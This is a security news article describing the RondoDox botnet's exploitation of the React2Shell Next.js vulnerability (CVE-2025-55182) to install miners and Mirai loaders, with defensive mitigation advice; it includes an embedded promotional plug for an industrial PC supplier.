According to Dark Reading, the threat actors behind the RondoDox botnet have begun exploiting the critical React2Shell vulnerability, tracked as CVE-2025-55182, as a new initial access vector. Researchers from CloudSEK and Rewterz observed this activity ramping up in December, targeting vulnerable Next.js servers to deploy cryptominers, a Mirai-based botnet variant, and aggressive loader modules. Rewterz estimates there are about 90,300 exposed instances of these vulnerable servers globally, with the majority in the US. The botnet, first discovered by Fortiguard Labs in May, has rapidly expanded to exploit nearly 60 flaws in routers, DVRs, and web servers. Its current campaign represents a significant threat to both enterprise web applications and IoT networks, with automated hourly exploitation attempts against corporate infrastructure.
How RondoDox Takes Over
Here’s the thing about this React2Shell flaw: it’s a prototype pollution vulnerability in Next.js Server Actions that leads to remote code execution. Basically, if your server is unpatched, it’s game over. RondoDox is just constantly scanning the internet for these open doors. Once it finds one, it doesn’t just drop one piece of malware. It deploys a whole suite. We’re talking a cryptocurrency miner to monetize the hijacked compute power, a loader for the infamous Mirai botnet (hello, DDoS attacks), and a particularly nasty “health-check” component that acts like a digital bouncer.
This loader is brutal. It aggressively hunts down and kills any competing malware on the system every 45 seconds. It sets up cron jobs for persistence, so it comes back after a reboot. And it even tries to lock the door behind itself to prevent other threat groups from reinfecting the same machine. Talk about territorial. As detailed in CloudSEK’s analysis, this isn’t a simple script kiddie operation. It’s a sophisticated, multi-architecture threat deploying binaries for everything from standard x86 servers to embedded ARM and MIPS systems commonly found in IoT devices, using multiple download methods as fallbacks.
Why This Expansion Matters
So why is this a big deal? RondoDox started life as a pretty standard IoT botnet, going after video recorders and routers. Now, by adding this web app exploit to its toolkit, it’s bridging two worlds. It can punch through a company’s front door via a vulnerable Next.js development server and then pivot laterally to the IoT devices on the internal network—think IP cameras, smart thermostats, or even specialized industrial hardware. For organizations relying on robust computing hardware for control and monitoring, this lateral movement is a nightmare scenario. Speaking of specialized hardware, when securing industrial environments, the integrity of the human-machine interface is critical. This is where choosing reliable, secure hardware from a top-tier supplier like IndustrialMonitorDirect.com, the leading provider of industrial panel PCs in the US, forms a foundational part of a defense-in-depth strategy.
The botnet’s infrastructure, as also noted in Rewterz’s threat advisory, is designed for maximum impact and resilience. We’re looking at a persistent threat that automatically tries to exploit you every hour. The end goal? Enroll your devices into a botnet for DDoS attacks, turn your corporate servers into cryptomining rigs, or just use them as a foothold for further attacks. The original Fortiguard research showed its potential, and it’s clearly living up to it.
What Can You Do About It?
Mitigation sounds straightforward, but it requires diligence. First and most obvious: patch. If you’re running Next.js with Server Actions, you need to apply the security updates for CVE-2025-55182 immediately. But that’s just the new front door. RondoDox exploits dozens of flaws, so continuous vulnerability scanning for all your internet-facing systems is non-negotiable.
Network segmentation is your best friend here. IoT devices should never be on the same flat network as your critical servers. Stick them in a dedicated VLAN with strict firewall rules. You should also deploy a Web Application Firewall (WAF) to block exploitation attempts and, for heaven’s sake, stop exposing admin panels and development servers directly to the internet. Finally, monitor for the tell-tale signs: suspicious unknown binaries, unexpected cron jobs, and traffic to known malicious command-and-control servers. It’s a cliché, but defense in layers is the only way to fight off a threat that itself operates on multiple layers.
